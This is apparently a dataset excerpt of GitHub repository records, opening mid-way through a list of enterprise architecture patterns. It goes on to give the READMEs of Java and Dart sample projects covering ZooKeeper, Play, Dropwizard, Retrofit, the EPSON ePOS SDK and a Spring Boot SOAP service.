- Types: - Lazy Initialization - Virtual Proxy - Value Holder - Ghost <a name="ObjectRelationalStructuralPatterns"/> **Object-Relational Structural Patterns** - Identity Field > Saves a database ID field in an object to maintain identity between an in-memory object and a database row. <br>![Screenshot](images/IdentityField.png) - Types: - Integral - Key Table - Compound Key - Foreign Key Mapping > Maps an association between objects to a foreign key reference between tables. <br>![Screenshot](images/ForeignKeyMapping.png) - Types: - Single-Valued Reference - Multi Table Find - Collection of References - Association Table Mapping > Saves an association as a table with foreign keys to the tables that are linked by the association. <br>![Screenshot](images/AssociationTableMapping.png) - Dependent Mapping > Has one class perform the database mapping for a child class. <br>![Screenshot](images/DependentMapping.png) - Embedded Value > Maps an object into several fields of another object’s table. <br>![Screenshot](images/EmbeddedValue.png) - Serialized LOB > Saves a graph of objects by serializing them into a single large object (LOB), which it stores in a database field. <br>![Screenshot](images/SerializedLOB.png) - Single Table Inheritance > Represents an inheritance hierarchy of classes as a single table that has columns for all the fields of the various classes. <br>![Screenshot](images/SingleTableInheritance.png) - Class Table Inheritance > Represents an inheritance hierarchy of classes with one table for each class. <br>![Screenshot](images/ClassTableInheritance.png) - Concrete Table Inheritance > Represents an inheritance hierarchy of classes with one table per concrete class in the hierarchy. <br>![Screenshot](images/ConcreteTableInheritance.png) - Inheritance Mappers > A structure to organize database mappers that handle inheritance hierarchies. <br>![Screenshot](images/InheritanceMappers.png) <a name="ObjectRelationalMetadataMappingPatterns"/> **Object-Relational Metadata Mapping Patterns** - Metadata Mapping > Holds details of object-relational mapping in metadata. <br>![Screenshot](images/MetadataMapping.png) - Query Object > An object that represents a database query. <br>![Screenshot](images/QueryObject.png) - Repository > Mediates between the domain and data mapping layers using a collection-like interface for accessing domain objects. <br>![Screenshot](images/Repository.png) <a name="WebPresentationPatterns"/> **Web Presentation Patterns** - Model View Controller > Splits user interface interaction into three distinct roles. <br>![Screenshot](images/ModelViewController.png) - Page Controller > An object that handles a request for a specific page or action on a Web site. <br>![Screenshot](images/PageController.png) - Front Controller > A controller that handles all requests for a Web site. <br>![Screenshot](images/FrontController.png) - Template View > Renders information into HTML by embedding markers in an HTML page. <br>![Screenshot](images/TemplateView.png) - Transform View > A view that processes domain data element by element and transforms it into HTML. <br>![Screenshot](images/TransformView.png) - Two Step View > Turns domain data into HTML in two steps: first by forming some kind of logical page, then rendering the logical page into HTML. <br>![Screenshot](images/TwoStepView.png) - Application Controller > A centralized point for handling screen navigation and the flow of an application. <br>![Screenshot](images/ApplicationController.png) <a name="DistributionPatterns"/> **Distribution Patterns** - Remote Facade > Provides a coarse-grained facade on fine-grained objects to improve efficiency over a network. <br>![Screenshot](images/RemoteFacade.png) - Data Transfer Object > An object that carries data between processes in order to reduce the number of method calls. <br>![Screenshot](images/DataTransferObject.png) <a name="OfflineConcurrencyPatterns"/> **Offline Concurrency Patterns** - Optimistic Offline Lock > Prevents conflicts between concurrent business transactions by detecting a conflict and rolling back the transaction. <br>![Screenshot](images/OptimisticOfflineLock.png) - Pessimistic Offline Lock > Prevents conflicts between concurrent business transactions by allowing only one business transaction at a time to access data. <br>![Screenshot](images/PessimisticOfflineLock.png) - Coarse-Grained Lock > Locks a set of related objects with a single lock. <br>![Screenshot](images/CoarseGrainedLock.png) - Implicit Lock > Allows framework or layer supertype code to acquire offline locks. <br>![Screenshot](images/ImplicitLock.png) **Session State Patterns** - Client Session State > Stores session state on the client. - Server Session State > Keeps the session state on a server system in a serialized form. - Database Session State > Stores session data as committed data in the database. <a name="BasePatterns"/> **Base Patterns** - Gateway > An object that encapsulates access to an external system or resource. <br>![Screenshot](images/Gateway.png) - Mapper > An object that sets up a communication between two independent objects. <br>![Screenshot](images/Mapper.png) - Layer Supertype > A type that acts as the supertype for all types in its layer. - Separated Interface > Defines an interface in a separate package from its implementation. <br>![Screenshot](images/SeparatedInterface.png) - Registry > A well-known object that other objects can use to find common objects and services. <br>![Screenshot](images/Registry.png) - Value Object > A small simple object, like money or a date range, whose equality isn’t based on identity. - Money > Represents a monetary value. <br>![Screenshot](images/Money.png) - Special Case > A subclass that provides special behavior for particular cases. <br>![Screenshot](images/SpecialCase.png) - Plugin > Links classes during configuration rather than compilation. <br>![Screenshot](images/Plugin.png) - Service Stub > Removes dependence upon problematic services during testing. <br>![Screenshot](images/ServiceStub.png) - Record Set > An in-memory representation of tabular data. <br>![Screenshot](images/RecordSet.png) ## Additional References - https://martinfowler.com/eaaCatalog/ - https://www.sourcecodeexamples.net/p/p-of-eaa.html - Lazy Load: Ghost - https://stackoverflow.com/questions/58243839/how-to-implement-lazy-loading-using-ghost-object-in-java
1
bkatwal/zookeeper-demo
Sample Distributed system created using spring boot app server and zookeeper as backbone
null
### GitLab [![build status](https://gitlab.com/bikas.katwal10/zookeeper-demo/badges/master/build.svg)](https://gitlab.com/bikas.katwal10/zookeeper-demo/pipelines) ![alt text](https://github.com/bkatwal/zookeeper-demo/blob/master/ZookeeperDemo.png) ## Key features supported: - Model a database that is replicated across multiple servers. - The system should scale horizontally, meaning if any new server instance is added to the cluster, it should have the latest data and start serving update/read requests. - Data consistency. All update requests will be forwarded to the leader, and then the leader will broadcast data to all active servers and then returns the update status. - Data can be read from any of the replicas without any inconsistencies. - All server in the cluster will store the cluster state — Information like, who is the leader and server state(list of live/dead servers in the cluster). This info is required by the leader server to broadcast update request to active servers, and active follower servers need to forward any update request to their leader. - In the event of a change in the cluster state(leader goes down/any server goes down), all servers in the cluster need to be notified and store the latest change in local cluster data storage. ## Setup and Usage 1. Install and start Apache Zookeeper in any port. Follow guide: https://zookeeper.apache.org/doc/r3.1.2/zookeeperStarted.html 2. Use below command to start the application in 3 ports: ``` java -Dserver.port=8081 -Dzk.url=localhost:2181 -Dleader.algo=2 -jar target/bkatwal-zookeeper-demo-1.0-SNAPSHOT.jar java -Dserver.port=8082 -Dzk.url=localhost:2181 -Dleader.algo=2 -jar target/bkatwal-zookeeper-demo-1.0-SNAPSHOT.jar java -Dserver.port=8083 -Dzk.url=localhost:2181 -Dleader.algo=2 -jar target/bkatwal-zookeeper-demo-1.0-SNAPSHOT.jar ``` `server.port` is spring app server port, `zk.url` is your zookeeper connection string and `leader.algo` if passed `2`, application will use ephemeral sequential znodes for leader election else will use ephemeral znodes. #### Look at swagger for API documentation for API details, Access swagger UI at `/swagger-ui.html` `GET /clusterInfo` - This API will display all the nodes in cluster, current list of live nodes and current master. `GET /persons` - This API will display all the saved Person. `PUT /person/{id}/{name}` - Use this to save person data.
1
typesafehub/playconf
Sample application for the introductory Play/Java online training course
null
PlayConf: Fictitious conference application =========================================== This application is used as a use case for **Building Reactive Play Apps** Java course from Typesafe Inc. You can sign up for the course [here](https://typesafe.com/how/online-training) Here is the outline of the course --------------------------------- - Introduction - Lesson 1 – Meet Play - Lesson 2 – Zero to Deploy - Lesson 3 – Working with Assets - You can download all the assets used in the lesson from [here](https://github.com/typesafehub/playconf/tree/master/assets-used-in-course) - Lesson 4 – Going Reactive - Lesson 5 – Using REST Services - Lesson 6 – Adding Tests
1
oregami/dropwizard-guice-jpa-seed
A sample REST application written in Java (dropwizard, guice, jpa, hibernate, cors and more)
null
[![Build Status](https://travis-ci.org/oregami/dropwizard-guice-jpa-seed.png)](https://travis-ci.org/oregami/dropwizard-guice-jpa-seed) dropwizard-guice-jpa-seed ========================= This a sample REST application written in Java. It's purpose is to create a generic project that can be used as a starting point for a new project, but also for learning efforts (I am building an open game database at www.oregami.org). - built on [Dropwizard](https://dropwizard.github.io/dropwizard/) version 0.7.0 - dependency injection with [Google Guice](https://code.google.com/p/google-guice/) (no Spring dependencies!) - [Hibernate](http://hibernate.org/) / JPA 2.1 as database access framework - [HSQLDB](http://hsqldb.org/) as database - read database configuration from Dropwizard yaml config file, persistence.xml is not used - "Session-per-HTTP-request" with Guice [PersistentFilter](https://code.google.com/p/google-guice/wiki/JPA) - suport for [cross-origin resource sharing](http://en.wikipedia.org/wiki/Cross-origin_resource_sharing) - JPA entities with [UUIDs](http://en.wikipedia.org/wiki/Universally_Unique_Identifier) as primary keys - Auditing/Version control of entities with [hibernate envers](http://envers.jboss.org/) - authentication with JSON Web Token via [dropwizard-auth-jwt](https://github.com/ToastShaman/dropwizard-auth-jwt) - Integration tests with [rest-assured](https://code.google.com/p/rest-assured/) - a pattern for accessing and manipulation entities with HTTP REST calls (Resource => Service => DAO => entity) - a pattern for ServiceResult objects which contain ServiceErrorMessages (which can later be bound to web form fields in the client) **Feel free to suggest corrections, optimizations or extensions via pull requests!** A corresponding **JavaScript client application (AngularJS)** is available at https://github.com/oregami/angularjs-rest-client/ # system architecture ![](docs/system_architecture.png?raw=true) # road map / things to do * more complex entities * hypermedia / HATEOAS # Usage * Start the application with the class "ToDoApplication" with the parameters "server todo.yml". * List all tasks with: GET => http://localhost:8080/task * Add a new task with: POST => http://localhost:8080/task Header: Content-Type:application/json JSON-Body e.g. : {"name" : "task 1", "description" : "This is a description"} * Modify a task: PUT => http://localhost:8080/task/[id] Header: Content-Type:application/json Accept:application/json JSON-Body e.g.: { "id": "402880944687600101468760d9ea0000", "version": "0", "name": "task 1 with new name", "description": "This is an updated description", "finished": "false" } * Remove a task: DELETE => http://localhost:8080/task/[id] * List all revision numbers of a task with: GET => http://localhost:8080/task/[id]/revisions * Show a single task with: GET => http://localhost:8080/task/[id] * Show a special revision of a single task with: GET => http://localhost:8080/task/[id]/revisions/[revisionNumber] * Create JSON Web Token for authentication: POST => http://localhost:8080/jwt/login?username=[username]&password=[password] e.g. with user1/password1 or user2/password2 * Check if your JSON Web Token is valid for authentication: GET => http://localhost:8080/jwt/test Authentication-Header: "Bearer [token]" I recommend you use the great **chrome extension [Postman](http://getpostman.com)** to make such HTTP calls! # Data model see http://wiki.oregami.org/display/DTA/Data+Model
1
isoos/gwt_mail_sample
Migrate the GWT mail sample application to Angular Dart
dart dartlang gwt
# AngularDart Mail Sample App Earlier this year (2017) I was asked if there’s a good way to compare developing web UIs in Google Web Toolkit (GWT) vs. Dart, specifically AngularDart. Having worked with both GWT and Dart, I had a good idea of the differences, but as I thought more, I started to wonder how hard it would be to migrate a GWT application to AngularDart. The GWT Mail Sample was an ideal place to start: it’s much more than a trivial example, with diverse features and complex UI interactions, yet it’s still manageable in size. - Demo: https://isoos.github.io/gwt_mail_sample/ - Article: https://medium.com/@isoos/from-gwt-to-angulardart-a-case-study-with-source-code-a049ba8b6df3 You may follow the [changelog](https://github.com/isoos/gwt_mail_sample/blob/master/log.md) or look at the [commits](https://github.com/isoos/gwt_mail_sample/commits/master) for the breakdown of the small steps needed.
1
sunrenjie/jpwh-2e-examples
Sample code from the book Java Persistence with Hibernate, Second Edition
null
null
1
jacobtabak/droidcon
Droidcon 2014 Retrofit Sample
null
Droidcon NYC 2014 Retrofit Demo =============================== This sample project demonstrates Retrofit implementations for the Foursquare and Reddit APIs. Foursquare ---------- The Foursquare demo is a rather straightforward retrofit implementation. The documentation for the venues endpoint can be found [here](https://developer.foursquare.com/docs/venues/search). You can find the Foursquare models [here] (app/src/main/java/com/timehop/droidcon2014retrofitsample/data/foursquare/model), and the Retrofit service interface in [FoursquareService.java] (app/src/main/java/com/timehop/droidcon2014retrofitsample/data/foursquare/FoursquareService.java). These models implement a strict pattern of defining the JSON field names in constants at the top of the file because our [legacy async task implementation] (app/src/main/java/com/timehop/droidcon2014retrofitsample/data/foursquare/legacy/VenueSearchTask.java) does not benefit from the @SerializedName annotation, an in order to maintain refactorability, the JSON field names must be defined separately. The 4sq service interface also has a nested class called `FoursquareService.Implementation` which can be used to access the default implementation of the service like this: ```java FoursquareService.Implementation.get() ``` With an instance of the service, you may call any methods defined in the FoursquareService interface, like so: ```java FoursquareService.Implementation.get().searchVenues("New York"); ``` To view the API in action, either look at the [tests] (app/src/androidTest/java/com/timehop/droidcon2014retrofitsample/data/foursquare/FoursquareTests.java) or [sample activity] (app/src/main/java/com/timehop/droidcon2014retrofitsample/VenueSearchActivity.java). Reddit ------ The reddit demo is a bit more complex since reddit returns dynamically-typed JSON. The API documentation for reddit is available [here](http://www.reddit.com/dev/api). The important thing to take out of this is that reddit 'things' are typed as follows: * t1: Comment * t2: Account * t3: Link * t4: Message * t5: Subreddit * t6: Award * t8: PromoCampaign The reddit models in this sample can be found [here] (/app/src/main/java/com/timehop/droidcon2014retrofitsample/data/reddit/model) and the Retrofit API interface can be found [here] (/app/src/main/java/com/timehop/droidcon2014retrofitsample/data/reddit/RedditService.java). The challenge is to instruct GSON through the use of a type adapter how to instantiate the correct subclass of `RedditObject` at runtime. This is achieved through the [RedditObjectDeserializer] (app/src/main/java/com/timehop/droidcon2014retrofitsample/data/reddit/RedditObjectDeserializer.java) with the help of the [RedditType enumeration] (app/src/main/java/com/timehop/droidcon2014retrofitsample/data/reddit/RedditType.java). The [RedditType enum] (app/src/main/java/com/timehop/droidcon2014retrofitsample/data/reddit/RedditType.java) maps the types defined in reddit documentation to the Java classes that model them. The [RedditObjectDeserializer] (app/src/main/java/com/timehop/droidcon2014retrofitsample/data/reddit/RedditObjectDeserializer.java) first examines the wrapped JSON objects that look like this: ```json { "kind": "t1", "data": { ... } } ``` and convert them into a [RedditObjectWrapper] (app/src/main/java/com/timehop/droidcon2014retrofitsample/data/reddit/model/RedditObjectWrapper.java) that looks like this: ```java public class RedditObjectWrapper { RedditType kind; JsonElement data; } ``` Then, [RedditObjectDeserializer] (app/src/main/java/com/timehop/droidcon2014retrofitsample/data/reddit/RedditObjectDeserializer.java) passes the wrapped json correct derived class into the existing deserialization context to create the correct model. ```java RedditObjectWrapper wrapper = new Gson().fromJson(json, RedditObjectWrapper.class); return context.deserialize(wrapper.data, wrapper.kind.getDerivedClass()); ``` Persisting Cookies ------------------ Check out [this gist](http://git.io/U2rqkg) for an easy way to persist cookies.
1
Kernald/recyclerview-sample
Sample for article at https://enoent.fr/blog/2015/01/18/recyclerview-basics/
null
null
1
EPSONePOS/ePOS
EPSON ePOS Printer Sample
null
# ePOS-Print SDK for Android ![N|Solid](http://global.epson.com/assets/img/logo.png) Version 1.9.0a Copyright Seiko Epson Corporation 2012-2015 All rights reserved. # About this software! The ePOS-Print SDK for Android is an SDK aimed at development engineers who are developing Android applications for printing on an EPSON TM printer. Applications are developed using the APIs provided by ePOS-Print SDK. ePOS-Print SDK for iOS for iOS devices is also provided in ePOS-Print SDK. For detailed information, please see ePOS-Print SDK for Android User's Manual. - Android Versions Android 2.3.3 to 2.3.7 Android 3.1 to 3.2.2 Android 4.0 to 4.4 Android 5.0 to 5.1 - Android Devices ARMv5TE-based Android devices - Supported Printers EPSON TM-T88V EPSON TM-T70 EPSON TM-T70II EPSON TM-T20 EPSON TM-T82 EPSON TM-T81II EPSON TM-T82II EPSON TM-U220 series EPSON TM-P60 EPSON TM-P60II EPSON TM-T90II EPSON TM-T20II EPSON TM-P80 EPSON TM-U330 series EPSON TM-T83II EPSON TM-P20 EPSON TM-m10 - Supported Interfaces Wired LAN Wireless LAN Bluetooth USB ### Supplied Files - ePOS-Print.jar Compiled Java class file, archived into a jar format file to allow APIs to be used from Java programs. - ePOSEasySelect.jar A Java class file for selecting a printer easily. - libeposprint.so Library for function execution. (ARMv5TE supported) - libeposeasyselect.so Library for the ePOSEasySelect function execution. (ARMv5TE supported) - ePOS-Print_Sample_Android.zip A sample program file. - EULA.en.txt Contains the SOFTWARE LICENSE AGREEMENT. - EULA.jp.txt Contains the SOFTWARE LICENSE AGREEMENT. (The Japanese-language edition) - ePOS-Print_SDK_Android_en_revP.pdf A user's manual. - ePOS-Print_SDK_Android_ja_revL.pdf A user's manual. (The Japanese-language edition) - ePOS-Print_SDK_Android_AppDevGuide_E_RevB.pdf A developer's guide - ePOS-Print_SDK_Android_AppDevGuide_J_RevB.pdf A developer's guide (The Japanese-language edition) - README.en.txt This file. - README.jp.txt The Japanese-language edition of this file. ### Remarks - For detailed information, please see ePOS-Print SDK for Android User's Manual. - In the case of USB interface, it is recommended that you obtain permission to access the USB device in the application in advance. Noted below, how to get the permission. 1. Enter the following code into the AndroidManifest.xml file. <manifest ...> <application> <activity ...> <intent-filter> <action android:name="android.hardware.usb.action.USB_DEVICE_ATTACHED" /> </intent-filter> <meta-data android:name="android.hardware.usb.action.USB_DEVICE_ATTACHED" android:resource="@xml/device_filter" /> </activity> </application> </manifest> 2. Add the res/xml/device_filter.xml in resource file, enter the following code into the device_filter.xml file. <?xml version="1.0" encoding="utf-8"?> <resources> <usb-device vendor-id="1208" /> </resources> Please select the OK button when you get the permission dialog is displayed. If you don't obtain permission to access the USB device in advance, there are the following notes when using the openPrinter method. - When you select the OK button in the Permissions dialog box, it takes a long time of about 10 seconds to open port. - When you select the Cancel button in the Permissions dialog box, it wait for a timeout of 30 seconds. ### Modification from the old version Version 1.9.0a - Improved the parseNFC API. - parseNFC API supports TM-m10 Ethernet model. - Bug Fixed. - In ePOSReceiptPrintSample, when the TM-T88V is to print on the paper of the paper width 58mm, a new line enters the middle of a line. - In ePOSReceiptPrintSample, print size of the logo is changed by the resolution of the screen. Version 1.9.0 - Added the beginTransaction API for beginning transaction. - Added the endTransaction API for ending transaction. - Added the support printers. - TM-m10 Ethernet model - TM-P80 Autocutter model Version 1.8.0 - Added the support printers. - TM-m10 USB model - Added getStatus API. - Bug Fixed. - Under Bluetooth connection, the openPrinter method may fail if application calls it immediately after the closePrinter method. Version 1.7.0 - Added the support Android version. - Android 5.0 to 5.1 - Added the support languages. - Indian - Improved the openPrinter API. - The openPrinter method succeeds even if the small letter is specified for the MAC address. (Only Bluetooth connection) Version 1.6.0 - Added the support printers. - TM-P20 - Added an printer search API for getting the device name. - Added the openPrinter API for timeout settings. - Improved the openPrinter API. - Not only IP address also MAC address or the host name can be set to the deviceName. (Only TCP/IP connection) - Improved the log function. - Compression of the backup file. - Improved the output content. - Specification change. - openPrinter returns an error after specified time passed if the target printer is already opened. (Only TCP/IP connection) Version 1.5.0 - Added the support printers. - TM-U330 - TM-T83II - Added an API for compression image data processing. Version 1.4.2 - Bug Fixed. - Status when calling sendData method was incorreect. Version 1.4.1 - Bug Fixed. - The openPrinter and sendData method causes one second delay, when printer doesn't have a battery. Version 1.4.0 - Added the support interface. - USB - Improved the status monitoring function. - Improved the communication efficiency of status acquisition. - Bug Fixed. - Added the support API of TM-P80 the addCut, addFeedPosition, addLayout API. Version 1.3.4a - Added the support Android version. - Android 4.4 Version 1.3.4 - Bug Fixed. - The closePriner method may fail during printer status monitoring. - When printer is offline, the openPrinter method may not return the correct printer status under Bluetooth connection. Version 1.3.3 - Improved the text printing speed. Version 1.3.2 - Added the support printers. - TM-T20II - TM-P80 Version 1.3.1 - Added the support printers. - TM-T90II - Added the support Android version. - Android 4.2.2 Version 1.3.0 - Added the log output function. - Added the support printers. - TM-T70II - Added the support Android version. - Android 4.2.1 Version 1.2.1 - Bug Fixed. Version 1.2.0 - Added a command generation API for controlling the label. - Added a command generation API to set the paper layout. - Added the support printers. - TM-T82II Version 1.1.0 - Added the printer status monitoring function. - Added the halftone method for raster graphic printing. - Support multiple tone printing. - Added the support languages. - Simplified Chinese - Traditional Chinese - Korean - Thai - Vietnamese - Added the battery status monitoring function. - Improved the performance of graphic printing. - Added the support printers. - TM-T20 - TM-T82 - TM-T81II - TM-P60II - TM-P60 (Wireless LAN) Version 1.0.0 - New release.
1
odnoklassniki/jvm-serviceability-examples
Sample code for the presentation on JVM Serviceability Tools
null
null
1
jonashackt/soap-spring-boot-cxf
Sample Project for producing & testing a SOAP-WSDL-driven Service with Spring Boot, Apache CXF & JAX-WS
apache-cxf java jax-ws soap spring-boot wsdl
# SOAP-Webservices with Apache CXF & SpringBoot using JAX-WS RI & JAXB - Annotations only, absolutely no XML [![Build Status](https://travis-ci.org/jonashackt/soap-spring-boot-cxf.svg?branch=master)](https://travis-ci.org/jonashackt/soap-spring-boot-cxf) [![Coverage Status](https://coveralls.io/repos/jonashackt/soap-spring-boot-cxf/badge.svg)](https://coveralls.io/r/jonashackt/soap-spring-boot-cxf) [![Dependency Status](https://www.versioneye.com/user/projects/56cc650818b27104252de8f6/badge.svg?style=flat)](https://www.versioneye.com/user/projects/56cc650818b27104252de8f6) As Example SOAP-Service I did some research, but after all the well-known [Weather-Service] seemed to be the best Use-Case, although (or because?) it is used by nearly every tutorial. It is really hard to find free SOAP-Services on the web. But i had to extend the Weather-Service a lot through out development - e.g. Custom Exceptions, more complex Input-Requests and a little less methods, so i can show my findings better. The biggest change was to split it into a WSDL (as "just the SOAP-interface") and a bunch of XSDs that import each other. That should represent a more complex domain and although they do not contain that much definitions, i can show many related techniques much better, that appear commonly in real-world scenarios. So this example-project is capable for bigger Use-Cases in Realworld-Scenarios with huge WSDLs and lots of imported XSDs, which again import tons of other XSDs. If you want, test it with your Service and i appreciate feedback :) ### General choices In the project I tried to use some relevant technologies for getting SOAP-Services running, like: * [Spring] with the aim to use absolutely no XML-Configuration (just Annotations) * [Spring Boot], for easy "not care about Container" (cause it has an embedded [Tomcat]) and simple deployment - like Microservices (without the "micro" in the interface, since we are bound to SOAP...) * One of the most relevant SOAP-Stack [Apache CXF] 3 as the Webservice-Stack to expose the SOAP-Webservices * Oracle´s JAX-WS RI (Reference Implementation) with the [JAX-WS-commons project] as "the Standard" to define Webservices in Java * [JAXB Java-XML-Binding] for working with XML * JAX-WS Commons for Generating the Class-Files for JAXB, managed by the maven plugin [jaxws-maven-plugin] I reached my aim to not use any XML-configuration, but it was harder than i thought... If you look on some detail, you´ll see what i mean. ### HowTo Use Run "mvn clean package"-command at command-line, to ensure that all necessary Java-Classes & JAXB-Bindings are generated Then, you could use Spring Boot with maven to expose your SOAP-Webservices ```sh mvn spring-boot:run ``` or run the build .jar-File with ```sh java -jar soap-spring-boot-cxf-0.0.5-SNAPSHOT.jar ``` ### Testing For testing end-to-end purposes I would recommend also getting [SOAP-UI], where you can check WSDL/XSD-compliance of the provided services very easily and you "see" your services. But getting to know, how stuff is working, it´s often better to have a look at some tests. There should be a amount of test-cases, that show standard (JAX-WS with CXF) ways to test webservices, but also non-standard approaches to test some UseCases i came across developing e.g. the custom SoapFaults on incorrect XML-messages. ### Facade-Mode Sometimes, you are in need of a facade-mode, where your implementation doesn´t call real backends and only returns Dummy-Responses. E.g. when you want to protect your backends when load is getting to high for them (not for your server :), that is based on solid Spring-technology) or even if you want to build up a new environment, where your backends are not available right from the start. And you want this configurable, so you can react fast, when needed. For this Scenario, Spring´s powerful [Aspect oriented programming (AOP)] mechanism will serve you well. In combination with using org.springframework.core.io.Resource to load your Dummy-Response-Files instead of Java´s NIO.2 (that could [fuck you up] because of classloader-differences in other environments than your local machine), your done with that task quite fast. ### Done´s * No XML-configuration, also for undocumented CXF-details :) * Readable Namespace-Prefixes * Testcases with Apache CXF * Custom SoapFault, when non-schmeme-compliant or syntactically incorrect XML is send to the service * Tests with Raw HTTP-Client for Reaction on syntactically incorrect XML * Custom Exception in Weather-WSDL/XSDs * Example of Controller and Mappers, that map to and from an internal Domain-Model - for loose coupling between generated JAXB-Classes and Backends * Facade-Mode, that only returns Dummy-Responses, if configured * Logging-Framework for centralization of logging and message-creation, including chance to define individial logging-Ids * Webservice-Method that returns a PDF-File (you can view the base64-encoded String inside the Webservice´ Response with a small Angular/Boot-App I wrote for that: [base64gular]) * PDF-Test with asserts of the PDF-contents via [Pdfbox] * Deployment to [Heroku], with inspiration from my colleague´s [blogpost] - see it in action (maybe you have to wait a while, cause it´s just a free Heroku-Dyno) [here] - or call it via [SOAP-UI] ## Loganalysis with [ELK-Stack] If you´re going some steps further into a more production-ready environment, you´ll need a more indepth view what´s going on with your SOAP-Infrastructure. I used the [ELK-Stack] with Logstash -> Elasticsearch -> Kibana. I used the [logstash-logback-encoder] for getting JSONized Logoutputs directly into logstash´s input-phase. ![Kibana SOAP-Message Analytics](https://github.com/jonashackt/soap-spring-boot-cxf/blob/master/kibana_SOAP-Message-Analytics.png) Making your SpringBoot-App ready for logstash, you have to add a maven-dependency and a logback.xml-File with the apropriate configuration, also described in [logstash-logback-encoder]. Before doing so, you need a running ELK-Stack, for me I used a docker-compose(ition) from [docker-elk]. For Mac-Users remember the new [docker-machine] superseeding boot2docker. Testing your configured ELK-Stack is easy by using [SOAP-UI]´s Load-Test-Feature. After having set up your ELK-Stack and logs are transferred via logstash into Elasticsearch and you activated SOAP-Message-Logging as shown in the CXF-WebService-Configuration, you for shure want to play aroung with the [Kibana´s Visualisation-Features]. And in the end you also want a [Dashboard] configured to show all your stylish Visualisations. You could end up with something like that: ![Kibana-Dashboard for SOAP-Message Analytics](https://github.com/jonashackt/soap-spring-boot-cxf/blob/master/kibana_SOAP-Analytics_dashboard.png) If if you can´t wait to start or the tutorials are [tldr;], then import my [kibana_export.json](https://github.com/jonashackt/soap-spring-boot-cxf/blob/master/kibana_export.json) as an example. ### Done´s with Loganalysis with ELK-Stack * Correlate all Log-Messages (Selfmade + ApacheCXFs SOAP-Messages) within the Scope of one Service-Consumer`s Call in Kibana via logback´s [MDC], placed in a Servlet-Filter * Log SOAP-Messages to logfile (configurable) * Log SOAP-Messages only to Elasticsearch-Field, not Console (other Implementation) * Extract SOAP-Service-Method for Loganalysis * SOAP-Messages-Only logged and formatted for Analysis * Added anonymize-logstash-filter for personal data in SOAP-Messages (e.g. for production environments in german companies) * Dead simple Calltime-Logging ## Functional plausibility check of request-data in the internal Domain-Model A very common problem of projects that implement SOAP-Webservices: the internal Domain-Model differs from the externally defined Model (the XML-Schema/XSD, that´s imported into the WSDL). This leads to mapping data from the generated JAXB-Classes to the internal Domain-Model, which could be handled simply in Java. But the internal Domain-Model´s data has to be validated after that mapping - e.g. to make sure, everything is correct and functionally plausible for further processing when backend-Systems are called. IMHO this topic isn´t covered well in the tutorial-landscape - the very least you can find is the hint to use [JSR303/349 Bean Validation], which is quite fast to apply but also quite limited, when it comes to more complex scenarios. And having multiple SOAP-Methods described in multiple Webservices with a multitude of fields that shouldn´t be null (and aren´t described as such in the XML-Schema) and lot´s of plausibilty to check depending on the former, you are in complexity hell. Than all research points you to the ongoing war of the [pros and cons to use RuleEngines](in deed, [Martin Fowler has something to say about that]) and trying to setup something like Drools (including the attempt to reduce Drools predominant complexity by building your own [spring-boot-starter-drools]). After getting into that trouble, you begin to hate all RulesEngines and try to build something yourself or use [EasyRules] with the problems pointed out well in [this presentation]. But i´am sorry, the complexity will stay there and you will get so many rule-classes and tests to handle, that you find you´re self in serious trouble, if your project is under pressure to release - which fore sure is the case, if you went through all this. Finally your domain-expert will visit you, showing a nice Excel-Table, which contains everything we discussed above - still relatively long - but much shorter than all your classes developed by hand - and you didn´t cover 10% of it by now. Maybe at this point you remember something you learned back in the days of your study - [decision tables]. The domain expert found the simplest solution possible for this complex problem with easy. Would´nt it be nice, if you had something like that - without the need to use something complex and hard to develop like Drools? [JSR303/349 Bean Validation]:https://en.wikipedia.org/wiki/Bean_Validation [Martin Fowler has something to say about that]:http://martinfowler.com/bliki/RulesEngine.html [pros and cons to use RuleEngines]:http://stackoverflow.com/questions/775170/when-should-you-not-use-a-rules-engine [spring-boot-starter-drools]:https://github.com/jonashackt/spring-boot-starter-drools [EasyRules]:http://www.easyrules.org/ [this presentation]:https://speakerdeck.com/benas/easy-rules [decision tables]:https://en.wikipedia.org/wiki/Decision_table ## Rules with DMN-Decision Tables compliant to the OMG-Standard One approach is to check the request-data with [decision tables]. For that I used a neat small but yet powerful Engine, which is quite a young one: [camunda´s DMN Engine](https://github.com/camunda/camunda-engine-dmn). It implements OMG´s [DMN-Standard](http://www.omg.org/spec/DMN/). In our Usecase we have Fields described in the internal Domain-Model, that have to be checked depending on the called WebService-Method and the Product. So I decided to go with two DMN-Decision-Tables: The first "weatherFields2Check.dmn" inherits rule to check, if the current field must be checked in the next step: ![WeatherFields2Check-DMN](https://github.com/jonashackt/soap-spring-boot-cxf/blob/master/weatherFields2CheckDMN.png) If the field has to be checked, the actual functional plausibility rules are applied - depending on the Product again: ![WeatherRules-DMN](https://github.com/jonashackt/soap-spring-boot-cxf/blob/master/weatherRulesDMN.png) For now, you have to separate Rules with different datatypes to different Decisiontable-columns. ## Todo's * Configure Servicename in logback.xml from static fields * Fault Tolerance with Hystrix (e.g. to avoid problems because of accumulated TimeOuts) [Spring]:https://spring.io [Spring Boot]:http://projects.spring.io/spring-boot/ [Spring WS]:http://projects.spring.io/spring-ws/ [Apache CXF]:http://cxf.apache.org/ [JAXB Java-XML-Binding]:http://en.wikipedia.org/wiki/Java_Architecture_for_XML_Binding [SOAP-UI]:http://www.soapui.org/ [jaxws-maven-plugin]:https://jax-ws-commons.java.net/jaxws-maven-plugin/ [JAX-WS-commons project]:https://jax-ws-commons.java.net/spring/ [Weather-Service]:http://wsf.cdyne.com/WeatherWS/Weather.asmx [Tomcat]:http://tomcat.apache.org/ [decision tables]:https://en.wikipedia.org/wiki/Decision_table [Aspect oriented programming (AOP)]:https://docs.spring.io/spring/docs/current/spring-framework-reference/html/aop.html [fuck you up]:https://github.com/jonashackt/springbootreadfilejar [ELK-Stack]:https://www.elastic.co/products [logstash-logback-encoder]:https://github.com/logstash/logstash-logback-encoder/tree/logstash-logback-encoder-4.5 [docker-elk]:https://github.com/jonashackt/docker-elk [docker-machine]:https://docs.docker.com/machine/get-started/ [Pdfbox]:https://pdfbox.apache.org/index.html [base64gular]:https://github.com/jonashackt/base64gular [MDC]:http://logback.qos.ch/manual/mdc.html [Heroku]:https://www.heroku.com/home [blogpost]:https://blog.codecentric.de/en/2015/10/deploying-spring-boot-applications-to-heroku/ [here]:https://soap-spring-boot-cxf.herokuapp.com/soap-api [Kibana´s Visualisation-Features]:https://www.timroes.de/2015/02/07/kibana-4-tutorial-part-3-visualize/ 